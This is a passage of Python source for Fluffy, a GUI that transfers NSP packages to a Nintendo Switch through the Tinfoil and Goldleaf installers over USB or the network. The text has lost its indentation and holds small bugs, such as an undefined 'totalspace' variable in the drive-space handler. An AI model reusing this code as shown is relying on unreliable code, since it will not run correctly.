12: "Mode Jaringan",
13: "Pemilihan NSP",
14: "NSP(s) Terpilih",
15: "Menunggu Request Koneksi",
16: "Batal",
17: "Error: Goldleaf Melemparkan Pengecualian.",
18: "Error: Tinfoil Melemparkan Pengecualian.",
19: "Error: Jaringan Melemparkan Pengecualian.",
20: "Mode Gelap",
21: "Opsi",
22: "Bahasa",
23: "Github",
24: "Jaringan",
25: "Headers Terkirim",
26: "NSP dalam Antrian",
27: "Menerapkan",
28: "Kecepatan Transfer",
29: "NCA Saat Ini",
30: "Tentang",
31: "Terima Kasih",
32: "Donasi Untukku",
}
KoreanDict = {0: "Fluffy",
1: "전송 시작",
2: "스위치 IP",
3: "이 컴퓨터의 IP",
4: "USB 전송 모드",
5: "일반 모드",
6: "안전 모드",
7: "현재 NSP",
8: "성공적으로 설치되었습니다",
9: "선택을 기다리고 있습니다",
10: "스위치가 감지되지 않았습니다",
11: "스위치가 감지되었습니다",
12: "네트워크 모드",
13: "NSP 선택",
14: "선택된 NSP",
15: "연결 요청 대기 중",
16: "취소",
17: "오류: Goldleaf에서 예외가 발생했습니다.",
18: "오류: Tinfoil에서 예외가 발생했습니다.",
19: "오류: 네트워크에서 예외가 발생했습니다.",
20: "어두운 모드",
21: "옵션",
22: "언어",
23: "Github",
24: "네트워크",
25: "헤더 보내기",
26: "대기열의 NSP",
27: "설치",
28: "전송율",
29: "현재 NCA",
30: "소개",
31: "특별 감사",
32: "기부",
}
set_language(language)
# End Language
# Setters
def set_dark_mode(v):
global dark_mode
if v == 1:
import qdarkstyle
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
dark_mode = 1
l_github.setStyleSheet("QLabel { color: rgba(255, 255, 255, 50%) }")
pixmap = QPixmap(dinlaypixmap)
gold_res = QPixmap(goldpixmap)
about_res = QPixmap(aboutpixmap)
screen = app.primaryScreen()
if screen.size().width() <= 2560:
if screen.size().width() <= 1920:
if screen.size().width() <= 1366:
lowresfix = pixmap.scaled(230, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix2 = gold_res.scaled(230, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix3 = about_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
gold_img_label.setPixmap(lowresfix2)
about_img_label.setPixmap(lowresfix3)
else:
lowresfix = pixmap.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix2 = gold_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix3 = about_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
gold_img_label.setPixmap(lowresfix2)
about_img_label.setPixmap(lowresfix3)
else:
lowresfix = pixmap.scaled(350, 240, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix2 = gold_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix3 = about_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
gold_img_label.setPixmap(lowresfix2)
about_img_label.setPixmap(lowresfix3)
else:
img_label.setPixmap(pixmap)
gold_img_label.setPixmap(gold_res)
about_img_label.setPixmap(about_res)
else:
dark_mode = 0
pixmap = QPixmap(inlaypixmap)
gold_res = QPixmap(goldpixmap)
about_res = QPixmap(aboutpixmap)
screen = app.primaryScreen()
app.setStyleSheet("")
l_github.setStyleSheet("QLabel { color: rgba(0, 0, 0, 50%) }")
if screen.size().width() <= 2560:
if screen.size().width() <= 1920:
if screen.size().width() <= 1366:
lowresfix = pixmap.scaled(230, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix2 = gold_res.scaled(230, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix3 = about_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
gold_img_label.setPixmap(lowresfix2)
about_img_label.setPixmap(lowresfix3)
else:
lowresfix = pixmap.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix2 = gold_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix3 = about_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
gold_img_label.setPixmap(lowresfix2)
about_img_label.setPixmap(lowresfix3)
else:
lowresfix = pixmap.scaled(350, 240, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix2 = gold_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
lowresfix3 = about_res.scaled(270, 270, Qt.KeepAspectRatio, Qt.SmoothTransformation)
img_label.setPixmap(lowresfix)
gold_img_label.setPixmap(lowresfix2)
about_img_label.setPixmap(lowresfix3)
else:
img_label.setPixmap(pixmap)
gold_img_label.setPixmap(gold_res)
about_img_label.setPixmap(about_res)
def turn_off_logging():
global is_logging
is_logging = False
def set_nca_name(v):
global cur_nca_name
cur_nca_name = v
def set_start_time():
global start_time
start_time = time.time()
def set_canceled(x):
global task_canceled
task_canceled = x
def set_cur_transfer_rate(v):
global cur_transfer_rate
cur_transfer_rate = v
def set_sent_header():
global sent_header
sent_header = True
def set_last_transfer_rate(v):
global last_transfer_rate
last_transfer_rate = v
def detach_switch():
global global_dev
global global_out
global global_in
try:
usb.util.dispose_resources(global_dev)
global_dev.reset()
except:
pass
global_in = None
global_out = None
global_dev = None
def connect_switch():
global global_dev
global global_out
global global_in
global_dev = usb.core.find(idVendor=0x057E, idProduct=0x3000)
if global_dev is not None:
try:
global_dev.set_configuration()
intf = global_dev.get_active_configuration()[(0,0)]
global_out = usb.util.find_descriptor(intf,custom_match=lambda e:usb.util.endpoint_direction(e.bEndpointAddress)==usb.util.ENDPOINT_OUT)
global_in = usb.util.find_descriptor(intf,custom_match=lambda e:usb.util.endpoint_direction(e.bEndpointAddress)==usb.util.ENDPOINT_IN)
return True
except:
return False
pass
else:
return False
def save_config():
try:
configp = configparser.ConfigParser()
configp['DEFAULT'] = {'switch_ip': switch_ip,
'language': language,
'dark_mode': dark_mode,
'allow_access_non_nsp': allow_access_non_nsp,
'ignore_warning_prompt': ignore_warning_prompt}
with open(initial_dir + 'fluffy.conf', 'w') as cfgfile:
configp.write(cfgfile)
except:
pass
def set_transfer_rate(v):
global transfer_rate
transfer_rate = TransferRateDict[v]
def get_response_qmessage(e):
global needresponse
global qrespnum
needresponse = True
qrespnum = e
def set_response_qmessage(x):
global qresponse
global haveresponse
haveresponse = True
qresponse = x
def reset_response():
global needresponse
global qresponse
global haveresponse
needresponse = False
qresponse = False
haveresponse = False
def set_dir(d):
global selected_dir
selected_dir = d
def set_selected_files(f):
global selected_files
selected_files = f
def set_progress(c, e):
global cur_progress
global end_progress
end_progress = e
cur_progress = c
def set_cur_nsp(nsp):
global cur_nsp_name
global cur_nsp_count
if cur_nsp_name != nsp:
if cur_nsp_name == "NA":
cur_nsp_name = nsp
else:
cur_nsp_count += 1
cur_nsp_name = nsp
set_start_time()
last_progress = 0
def cancel_task():
set_canceled(True)
reset_install()
def set_total_nsp(n):
global total_nsp
total_nsp = n
def complete_install():
global is_done
is_done = True
def complete_goldleaf_transfer():
global is_installing
is_installing = False
def reset_install():
global is_installing
global sent_header
global is_done
global cur_progress
global end_progress
global cur_nsp_name
global cur_transfer_rate
global last_transfer_rate
global selected_files
global selected_dir
global total_nsp
global cur_nsp_count
list_nsp.clear()
btn_header.setEnabled(True)
btn_nsp.setEnabled(True)
combo.setEnabled(True)
txt_ip.setEnabled(True)
txt_ip2.setEnabled(True)
net_radio.setEnabled(True)
usb_radio.setEnabled(True)
txt_port.setEnabled(True)
tin_radio.setEnabled(True)
gold_radio.setEnabled(True)
l_nsp.setText("")
l_nsp.setStyleSheet("")
l_switch.setText("")
l_switch.setStyleSheet("")
l_status.setStyleSheet("")
if is_goldleaf:
l_status.setText('')
progressbar.setValue(0)
cur_nsp_count = 1
total_nsp = 0
selected_files = None
selected_dir = None
cur_nsp_name = "NA"
cur_transfer_rate = 0
last_transfer_rate = 0
is_done = False
is_installing = False
sent_header = False
cur_progress = 0
end_progress = 100
UI.init_language()
window.menuBar().setEnabled(True)
if is_network:
UI.net_radio_cmd()
else:
UI.usb_radio_cmd()
def throw_error(_type):
global last_error
if _type == 0:
last_error = Language.CurrentDict[17] # Goldleaf
elif _type == 1:
last_error = Language.CurrentDict[19] # Network
elif _type == 2:
last_error = Language.CurrentDict[18] # Tinfoil
def reset_last_error():
global last_error
last_error = "NA"
def complete_loading():
global is_installing
is_installing = True
def set_network(v):
global is_network
is_network = v
def set_ip(v, n):
global switch_ip
global host_ip
if n == 0:
switch_ip = v
else:
host_ip = v
def set_goldleaf(v):
global is_goldleaf
is_goldleaf = v
def set_usb_success(v):
global usb_success
usb_success = v
# Goldleaf
class GoldleafCommandId:
ListSystemDrives = 0
GetEnvironmentPaths = 1
GetPathType = 2
ListDirectories = 3
ListFiles = 4
GetFileSize = 5
FileRead = 6
FileWrite = 7
CreateFile = 8
CreateDirectory = 9
DeleteFile = 10
DeleteDirectory = 11
RenameFile = 12
RenameDirectory = 13
GetDriveTotalSpace = 14
GetDriveFreeSpace = 15
GetNSPContents = 16
Max = 17
class GoldleafCommandReadResult:
Success = 0
InvalidMagic = 1
InvalidGoldleafCommandId = 2
class Goldleaf:
GLUC = b"GLUC"
magic = b"GLUC"
cmd_id = 0
drives = {}
FW_DENIED = 0
FW_ACCEPTED = 1
FW_NOSTATUS = 2
fw_status = FW_NOSTATUS
def init(self):
try:
detach_switch()
connect_switch()
self.goldleaf_usb()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
throw_error(0)
sys.exit()
def write(self,buffer):
try:
global_out.write(buffer,timeout=3000)
except:
pass
def read(self,length):
return global_in.read(length,timeout=0).tobytes()
def write_u32(self,x):
try:
global_out.write(struct.pack("<I", x))
except:
pass
def write_u64(self,x):
try:
global_out.write(struct.pack("<Q", x))
except:
pass
def write_string(self,x):
try:
self.write_u32(len(x))
self.write(x.encode())
except:
pass
def read_u32(self):
return struct.unpack("<I", self.read(4))[0]
def read_u64(self):
return struct.unpack("<Q", self.read(8))[0]
def read_string(self):
return self.read(self.read_u32() + 1)[:-1].decode()
def magic_ok(self):
return self.GLUC == self.magic
def is_id(self,a_cmd):
return a_cmd == self.cmd_id
def read_cmd(self):
try:
self.magic = self.read(4)
self.cmd_id = self.read_u32()
except:
pass
def write_cmd(self,a_cmd):
try:
self.write(self.magic)
self.write_u32(a_cmd)
except:
pass
def read_path(self):
path = self.read_string()
drive = path.split(":", 1)[0]
try:
path = path.replace(drive + ":", self.drives[drive])
except KeyError:
pass
return path
def goldleaf_usb(self):
while global_dev is not None and not task_canceled:
self.read_cmd()
if self.magic_ok():
if self.is_id(GoldleafCommandId.ListSystemDrives):
drive_labels = {}
if "win" in sys.platform[:3].lower():
import string
import ctypes
kernel32 = ctypes.windll.kernel32
bitmask = kernel32.GetLogicalDrives()
for letter in string.ascii_uppercase:
if bitmask & 1:
self.drives[letter] = letter + ":/"
label_buf = ctypes.create_unicode_buffer(1024)
kernel32.GetVolumeInformationW(
ctypes.c_wchar_p(letter + ":\\"),
label_buf,
ctypes.sizeof(label_buf),
None,
None,
None,
None,
0
)
if label_buf.value:
drive_labels[letter] = label_buf.value
bitmask >>= 1
else:
self.drives["ROOT"] = "/"
self.write_u32(len(self.drives))
for d in self.drives:
try:
self.write_string(drive_labels[d])
except KeyError:
self.write_string(d)
self.write_string(d)
elif self.is_id(GoldleafCommandId.GetEnvironmentPaths):
env_paths = {x:os.path.expanduser("~/"+x) for x in ["Desktop", "Documents"]}
for arg in sys.argv[1:]:
folder = os.path.abspath(arg)
if os.path.isfile(folder):
folder = os.path.dirname(folder)
env_paths[os.path.basename(folder)] = folder
env_paths = {x:env_paths[x] for x in env_paths if os.path.exists(env_paths[x])}
self.write_u32(len(env_paths))
for env in env_paths:
env_paths[env] = env_paths[env].replace("\\", "/")
self.write_string(env)
if env_paths[env][1:3] != ":/":
env_paths[env] = "ROOT:" + env_paths[env]
self.write_string(env_paths[env])
elif self.is_id(GoldleafCommandId.GetPathType):
ptype = 0
path = self.read_path()
if os.path.isfile(path):
ptype = 1
elif os.path.isdir(path):
ptype = 2
self.write_u32(ptype)
elif self.is_id(GoldleafCommandId.ListDirectories):
path = self.read_path()
ents = [x for x in os.listdir(path) if os.path.isdir(os.path.join(path, x))]
n_ents = []
for e in ents:
try:
test = os.listdir(os.path.join(path, e))
n_ents.append(e)
except:
pass
self.write_u32(len(n_ents))
for name in n_ents:
self.write_string(name)
elif self.is_id(GoldleafCommandId.ListFiles):
self.fw_status = self.FW_NOSTATUS
if is_installing:
complete_goldleaf_transfer()
path = self.read_path()
ents = [x for x in os.listdir(path) if os.path.isfile(os.path.join(path, x))]
if not allow_access_non_nsp:
len_nsps = 0
for f in ents:
if f.lower().endswith('.nsp'):
len_nsps = len_nsps+1
self.write_u32(len_nsps)
for name in ents:
if name.lower().endswith('.nsp'):
self.write_string(name)
else:
self.write_u32(len(ents))
for name in ents:
self.write_string(name)
elif self.is_id(GoldleafCommandId.GetFileSize):
path = self.read_path()
self.write_u64(os.path.getsize(path))
elif self.is_id(GoldleafCommandId.FileRead):
can_read = True
offset = self.read_u64()
size = self.read_u64()
path = self.read_path()
if not os.path.basename(path).lower().endswith('.nsp'):
if allow_access_non_nsp:
can_read = True
else:
can_read = False
if can_read:
with open(path, "rb") as f:
f.seek(offset)
data = f.read(size)
self.write_u64(len(data))
self.write(data)
try:
if self.fw_status != self.FW_DENIED:
complete_loading()
set_cur_nsp(str(os.path.basename(path)))
set_progress(int(offset), int(os.path.getsize(path)))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(int(offset) - last_transfer_rate)
set_last_transfer_rate(int(offset))
set_start_time()
else:
complete_goldleaf_transfer()
except:
pass
else:
logging.debug("Error: Access denied. \nReason: Goldleaf tried to access a non .NSP file(to bypass this default restriction, change \'allow_access_non_nsp\' to 1 in fluffy.conf).")
print("Error: Access denied. \nReason: Goldleaf tried to access a non .NSP file(to bypass this default restriction, change \'allow_access_non_nsp\' to 1 in fluffy.conf).")
cancel_task()
sys.exit()
elif self.is_id(GoldleafCommandId.FileWrite):
offset = self.read_u64()
size = self.read_u64()
path = self.read_path()
data = self.read(size)
can_write = False
if self.fw_status == self.FW_NOSTATUS:
get_response_qmessage(1)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
self.fw_status = self.FW_ACCEPTED
can_write = True
else:
self.fw_status = self.FW_DENIED
elif self.fw_status == self.FW_ACCEPTED:
can_write = True
if can_write:
cont = bytearray()
try:
with open(path, "rb") as f:
cont=bytearray(f.read())
except FileNotFoundError:
pass
cont[offset:offset + size] = data
with open(path, "wb") as f:
f.write(cont)
reset_response()
elif self.is_id(GoldleafCommandId.CreateFile):
path = self.read_path()
get_response_qmessage(2)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
open(path, "a").close()
reset_response()
elif self.is_id(GoldleafCommandId.CreateDirectory):
path = self.read_path()
get_response_qmessage(3)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
try:
os.mkdir(path)
except os.FileExistsError:
pass
reset_response()
elif self.is_id(GoldleafCommandId.DeleteFile):
path = self.read_path()
get_response_qmessage(4)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
os.remove(path)
reset_response()
elif self.is_id(GoldleafCommandId.DeleteDirectory):
path = self.read_path()
get_response_qmessage(5)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
shutil.rmtree(path)
reset_response()
elif self.is_id(GoldleafCommandId.RenameFile):
path = self.read_path()
new_name = self.read_string()
get_response_qmessage(6)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
os.rename(path, new_name)
reset_response()
elif self.is_id(GoldleafCommandId.RenameDirectory):
path = self.read_path()
new_name = self.read_path()
get_response_qmessage(6)
while not haveresponse and global_dev is not None:
time.sleep(1)
if qresponse:
os.rename(path, new_name)
reset_response()
elif self.is_id(GoldleafCommandId.GetDriveTotalSpace):
path = self.read_path()
disk = os.statvfs(path)
totalBytes = float(disk.f_bsize*disk.f_blocks)
self.write_u64(int(totalspace))
elif self.is_id(GoldleafCommandId.GetDriveFreeSpace):
path = self.read_path()
disk = os.statvfs(path)
totalFreeSpace = float(disk.f_bsize*disk.f_bfree)
self.write_u64(int(totalFreeSpace))
sys.exit()
# Tinfoil Network
netrlist = []
def reset_netrlist():
global netrlist
netrlist = None
netrlist = []
def append_netrlist(v, v2):
global netrlist
netrlist.append((v, v2))
class TinfoilNetwork:
def init(self):
reset_netrlist()
accepted_extension = ('.nsp')
hostPort = random.randint(26490,26999)
target_ip = switch_ip
hostIp = host_ip
target_path = str(selected_dir).strip()
baseUrl = hostIp + ':' + str(hostPort) + '/'
directory = target_path
file_list_payload = ''
for file in [file for file in next(os.walk(target_path))[2] if file.endswith(accepted_extension)]:
for y in selected_files:
if str(file).find(os.path.basename(y)) != -1:
n = random.randint(1,10000000)
fake_file = str(n) + ".nsp"
append_netrlist(fake_file, str(y))
file_list_payload += baseUrl + fake_file + '\n'
file_list_payloadBytes = file_list_payload.encode('ascii')
if directory and directory != '.':
os.chdir(directory)
server = TinfoilServer((host_ip, hostPort), TinfoilHTTPHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, 2000))
sock.sendall(struct.pack('!L', len(file_list_payloadBytes)) + file_list_payloadBytes)
while len(sock.recv(1)) < 1:
if task_canceled:
server.force_stop()
sys.exit()
time.sleep(0.1)
sock.close()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
server.force_stop()
throw_error(1)
sys.exit()
complete_install()
server.force_stop()
sys.exit()
class TinfoilHTTPHandler(SimpleHTTPRequestHandler):
def send_head(self):
for s in range(len(netrlist)):
if netrlist[s][0] == str(self.path)[1:]:
path = netrlist[s][1]
ctype = self.guess_type(path)
if os.path.isdir(path):
return SimpleHTTPRequestHandler.send_head(self)
if not os.path.exists(path):
return self.send_error(404, self.responses.get(404)[0])
f = open(path, 'rb')
fs = os.fstat(f.fileno())
size = fs[6]
start, end = 0, size - 1
if 'Range' in self.headers:
start, end = self.headers.get('Range').strip().strip('bytes=')\
.split('-')
if start == "":
try:
end = int(end)
except ValueError as e:
self.send_error(400, 'invalid range')
start = size - end
else:
try:
start = int(start)
except ValueError as e:
self.send_error(400, 'invalid range')
if start >= size:
self.send_error(416, self.responses.get(416)[0])
if end == "":
end = size - 1
else:
try:
end = int(end)
except ValueError as e:
self.send_error(400, 'invalid range')
start = max(start, 0)
end = min(end, size - 1)
self.range = (start, end)
cont_length = end - start + 1
if 'Range' in self.headers:
self.send_response(206)
else:
self.send_response(200)
self.send_header('Content-type', ctype)
self.send_header('Accept-Ranges', 'bytes')
self.send_header('Content-Range','bytes %s-%s/%s' % (start, end, size))
self.send_header('Content-Length', str(cont_length))
self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
self.end_headers()
return f
def copyfile(self, infile, outfile):
if 'Range' not in self.headers:
SimpleHTTPRequestHandler.copyfile(self, infile, outfile)
return
complete_loading()
set_cur_nsp(str(os.path.basename(infile.name)))
start, end = self.range
infile.seek(start)
bufsize = 64 * 1024 # 64KB
while True:
if task_canceled: sys.exit()
buf = infile.read(bufsize)
if not buf:
break
try:
outfile.write(buf)
try:
set_progress(int(infile.tell()), int(end))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(int(infile.tell()) - last_transfer_rate)
set_last_transfer_rate(int(infile.tell()))
set_start_time()
except:
pass
except BrokenPipeError:
pass
class TinfoilServer(TCPServer):
stopped = False
def server_bind(self):
import socket
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def serve_forever(self):
while not self.stopped:
if task_canceled: sys.exit()
self.handle_request()
sys.exit()
def force_stop(self):
self.server_close()
self.stopped = True
sys.exit()
# Tinfoil USB
class Tinfoil:
CMD_ID_EXIT = 0
CMD_ID_FILE_RANGE = 1
CMD_TYPE_RESPONSE = 1
def init(self):
try:
detach_switch()
connect_switch()
self.send_nsp_list()
self.poll_commands()
complete_install()
sys.exit()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
throw_error(2)
sys.exit()
def send_response_header(self, cmd_id, data_size):
global_out.write(b'TUC0')
global_out.write(struct.pack('<B', self.CMD_TYPE_RESPONSE))
global_out.write(b'\x00' * 3)
global_out.write(struct.pack('<I', cmd_id))
global_out.write(struct.pack('<Q', data_size))
global_out.write(b'\x00' * 0xC)
def file_range_cmd(self, data_size):
file_range_header = global_in.read(0x20)
range_size = struct.unpack('<Q', file_range_header[:8])[0]
range_offset = struct.unpack('<Q', file_range_header[8:16])[0]
nsp_name_len = struct.unpack('<Q', file_range_header[16:24])[0]
nsp_name = bytes(global_in.read(nsp_name_len)).decode('utf-8')
set_cur_nsp(str(os.path.basename(nsp_name)))
self.send_response_header(self.CMD_ID_FILE_RANGE, range_size)
with open(nsp_name, 'rb') as f:
complete_loading()
f.seek(range_offset)
curr_off = 0x0
end_off = range_size
read_size = transfer_rate
while curr_off < end_off:
if task_canceled: sys.exit()
if curr_off + read_size >= end_off:
read_size = end_off - curr_off
try:
set_progress(int(end_off), int(end_off))
except:
pass
buf = f.read(read_size)
global_out.write(data=buf, timeout=0)
curr_off += read_size
try:
set_progress(int(curr_off), int(end_off))
elapsed_time = time.time() - start_time
if elapsed_time >= 1:
set_cur_transfer_rate(curr_off - last_transfer_rate)
set_last_transfer_rate(curr_off)
set_start_time()
except:
pass
def poll_commands(self):
while True:
if task_canceled: sys.exit()
cmd_header = bytes(global_in.read(0x20, timeout=0))
magic = cmd_header[:4]
if magic != b'TUC0':
continue
cmd_type = struct.unpack('<B', cmd_header[4:5])[0]
cmd_id = struct.unpack('<I', cmd_header[8:12])[0]
data_size = struct.unpack('<Q', cmd_header[12:20])[0]
if cmd_id == self.CMD_ID_EXIT:
complete_install()
sys.exit()
elif cmd_id == self.CMD_ID_FILE_RANGE:
self.file_range_cmd(data_size)
def send_nsp_list(self):
nsp_path_list = list()
nsp_path_list_len = 0
for nsp_path in os.listdir(selected_dir):
if nsp_path.endswith(".nsp"):
for y in selected_files:
if str(nsp_path).find(os.path.basename(y)) != -1:
print(str(nsp_path))
nsp_path_list.append(selected_dir + "/" + nsp_path.__str__() + '\n')
nsp_path_list_len += len(selected_dir + "/" + nsp_path.__str__()) + 1
global_out.write(b'TUL0')
global_out.write(struct.pack('<I', nsp_path_list_len))
global_out.write(b'\x00' * 0x8)
for nsp_path in nsp_path_list:
global_out.write(nsp_path)
# UI
class UI:
@staticmethod
def send_header_cmd():
if not sent_header:
set_canceled(False)
btn_header.setEnabled(False)
btn_nsp.setEnabled(False)
combo.setEnabled(False)
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
net_radio.setEnabled(False)
usb_radio.setEnabled(False)
txt_port.setEnabled(False)
tin_radio.setEnabled(False)
gold_radio.setEnabled(False)
window.menuBar().setEnabled(False)
if combo.currentText() == Language.CurrentDict[5]:
set_transfer_rate(1)
elif combo.currentText() == Language.CurrentDict[6]:
set_transfer_rate(0)
if is_network:
set_ip(txt_ip.text(), 0)
set_ip(txt_ip2.text(), 1)
set_sent_header()
set_start_time()
tinnet = TinfoilNetwork()
thread = threading.Thread(target=tinnet.init)
thread.daemon = True
thread.start()
else:
if is_goldleaf:
set_sent_header()
set_start_time()
gold = Goldleaf()
thread = threading.Thread(target=gold.init)
thread.daemon = True
thread.start()
else:
set_sent_header()
set_start_time()
tin = Tinfoil()
thread = threading.Thread(target=tin.init)
thread.daemon = True
thread.start()
else:
cancel_task()
@staticmethod
def nsp_file_dialog():
try:
d = filedialog.askopenfilenames(parent=root,title=Language.CurrentDict[13],filetypes=[("NSP files", "*.nsp")])
tmp = list()
list_nsp.clear()
i = 0
if not is_goldleaf:
file_list = list(d)
for f in file_list:
if str(f).endswith(".nsp"):
i += 1
list_nsp.addItem(os.path.basename(str(f)))
tmp.append(f)
else:
tmp.append(str(d))
list_nsp.addItem(os.path.basename(str(d)))
i+=1
if i > 0:
btn_header.setEnabled(True)
set_total_nsp(i)
set_dir(os.path.dirname(tmp[0]))
set_selected_files(tmp)
l_status.setText(str(total_nsp) + " " + Language.CurrentDict[14])
else:
btn_header.setEnabled(False)
l_status.setText(Language.CurrentDict[9])
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
pass
@staticmethod
def dark_mode_cmd():
if dark_check.isChecked():
try:
set_dark_mode(1)
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
logging.debug('Error: Failed to set Dark Mode')
print('Error: Failed to set Dark Mode')
print(str(e))
pass
else:
set_dark_mode(0)
@staticmethod
def tin_radio_cmd():
l_nsp.setVisible(True)
combo.setVisible(True)
l_rate.setVisible(True)
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port.setEnabled(False)
net_radio.setChecked(False)
usb_radio.setChecked(True)
net_radio.setVisible(True)
set_goldleaf(False)
split_check.setEnabled(True)
l_status.setText(Language.CurrentDict[9])
gold_img_label.setVisible(False)
btn_header.setEnabled(False)
btn_nsp.setEnabled(True)
btn_nsp.setVisible(True)
l_ip.setVisible(True)
txt_ip.setVisible(True)
list_nsp.setVisible(True)
txt_ip2.setVisible(True)
l_host.setVisible(True)
usb_radio.setVisible(True)
window.adjustSize()
@staticmethod
def gold_radio_cmd():
l_nsp.setVisible(False)
combo.setVisible(False)
l_rate.setVisible(False)
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
txt_port.setEnabled(False)
net_radio.setChecked(False)
usb_radio.setChecked(True)
net_radio.setVisible(False)
set_network(False)
set_goldleaf(True)
split_check.setCheckState(False)
split_check.setEnabled(False)
list_nsp.clear()
l_status.setText('')
btn_nsp.setVisible(False)
l_ip.setVisible(False)
txt_ip.setVisible(False)
list_nsp.setVisible(False)
txt_ip2.setVisible(False)
l_host.setVisible(False)
usb_radio.setVisible(False)
gold_img_label.setVisible(True)
window.adjustSize()
@staticmethod
def usb_radio_cmd():
txt_ip.setEnabled(False)
txt_ip2.setEnabled(False)
combo.setEnabled(True)
set_network(False)
txt_port.setEnabled(False)
split_check.setEnabled(True)
@staticmethod
def net_radio_cmd():
txt_ip.setEnabled(True)
txt_ip2.setEnabled(True)
combo.setEnabled(False)
set_network(True)
txt_port.setEnabled(True)
split_check.setCheckState(False)
split_check.setEnabled(False)
@staticmethod
def set_done_text():
tmp_string = str(total_nsp)
if not is_goldleaf:
reset_install()
l_nsp.setText(Language.CurrentDict[8] + " " + tmp_string + " NSP(s)!")
@staticmethod
def set_loading_text():
l_nsp.setText("")
l_status.setText("")
if not is_goldleaf:
l_switch.setText(str(total_nsp) + " " + Language.CurrentDict[26] + ".")
l_switch.setStyleSheet(PURPLE)
else:
l_switch.setText(Language.CurrentDict[9] + ".")
l_switch.setStyleSheet(BLUE)
progressbar.setValue(0)
@staticmethod
def set_progress_text():
v = (int(cur_progress) / int(end_progress)) * 100
progressbar.setValue(v)
n_rate = round((cur_transfer_rate /1000000),2)
if n_rate < 0:
n_rate = 0.0
if not is_goldleaf:
l_status.setText(Language.CurrentDict[27] + " " + str(cur_nsp_count) + " / " + str(total_nsp) + " NSP(s).")
l_switch.setText(Language.CurrentDict[28] + ": " + str(n_rate) + "MB/s.")
l_switch.setStyleSheet(GREEN)
l_status.setStyleSheet(GREEN)
if len(cur_nsp_name) > 13:
if is_goldleaf:
l_status.setText("\"" + cur_nsp_name[:13] + "...\"")
else:
l_nsp.setText(Language.CurrentDict[7] + ": \"" + cur_nsp_name[:13] + "...\"")
else:
if is_goldleaf:
l_status.setText("\"" + cur_nsp_name + "\"")
else:
l_nsp.setText(Language.CurrentDict[7] + ": \"" + cur_nsp_name + "\"")
@staticmethod
def set_switch_text():
try:
if connect_switch():
set_usb_success(True)
l_switch.setText(Language.CurrentDict[11]+"!")
l_switch.setStyleSheet(GREEN)
if not is_goldleaf:
if list_nsp.count() > 0:
btn_header.setEnabled(True)
else:
btn_header.setEnabled(False)
else:
btn_header.setEnabled(True)
else:
l_switch.setText(Language.CurrentDict[10]+"!")
btn_header.setEnabled(False)
l_switch.setStyleSheet(RED)
try:
detach_switch()
except:
pass
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
set_usb_success(False)
UI.check_usb_success()
pass
@staticmethod
def init_language():
l_nsp.setText("")
if not is_goldleaf:
if list_nsp.count() > 0:
l_status.setText(str(total_nsp) + " " + Language.CurrentDict[14])
else:
l_status.setText(Language.CurrentDict[9])
l_switch.setText(Language.CurrentDict[10]+"!")
l_ip.setText(Language.CurrentDict[2]+":")
dark_check.setText(Language.CurrentDict[20])
net_radio.setText(Language.CurrentDict[24])
btn_nsp.setText(Language.CurrentDict[13])
btn_header.setText(Language.CurrentDict[1])
l_rate.setText(Language.CurrentDict[4])
combo.clear()
combo.SelectedIndex = 0
combo.addItem(Language.CurrentDict[5])
combo.addItem(Language.CurrentDict[6])
l_host.setText(Language.CurrentDict[3]+":")
lang_menu.setTitle(Language.CurrentDict[22])
window.setWindowTitle(Language.CurrentDict[0])
about.setWindowTitle(Language.CurrentDict[30])
l_thanks.setText(Language.CurrentDict[31])
l_donate.setText(Language.CurrentDict[32])
about_menu.setText(Language.CurrentDict[30])
@staticmethod
def lang_menu_cmd():
new_lang = None
ai = 0
for action in lang_menu.actions():
if action.isChecked():
if ai != language:
set_language(ai)
UI.init_language()
ai+=1
